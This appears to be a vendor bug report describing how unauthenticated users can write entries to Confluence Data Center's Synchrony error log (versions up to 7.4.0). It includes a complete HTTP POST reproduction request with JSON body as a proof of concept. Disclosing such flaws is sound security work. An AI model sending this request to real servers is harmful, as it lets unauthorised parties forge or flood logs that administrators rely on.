h3. Issue Summary
It is possible to write log entries via Synchrony API without authentication.
h3. Steps to Reproduce
To do this, you have to enter the target URL in Postman:<base URL>, copy the GET or POST request and send the http request.
For all POST requests, you must ensure that the content length matches (e.g. if the POST body has 231 characters, the content length must also be 231). I have marked in orange what to look out for in the individual inquiries.
Send the following http POST request to the web server:
{noformat}
POST /synchrony/v1/errorlog HTTP/1.1
Host: <baseURL>
Content-Length: 206
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/json
Accept: /
Origin: <baseURL>
Referer: <baseURL>/pages/resumedraft.action?draftId=22839529&draftShareId=8ed7dcf2-8b7e-41c4-aa0b-a8511dad37fb&
Accept-Encoding: gzip, deflate
Accept-Language: de-DE,de;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
{“clientId”:“IJjq9O5FeRuZWfZ60tthnzs”, “entityId”:“/Synchrony-1274ffbb-8ef2-3131-b438-d2b6304af43f/confluence-22839528”, “message”:“test error message”, “source”:“client”, “oo”:“test_error”, “clientId”:“test”}{noformat}
h3. Expected Results
Nothing is displayed in logs with when an unauthenticated user sends a request.
h3. Actual Results
User can write to the log.
h3. Workaround
Currently there is no known workaround for this behavior. A workaround will be added here when available
CPE | Name | Operator | Version |
---|---|---|---|
confluence data center | le | 7.4.0 |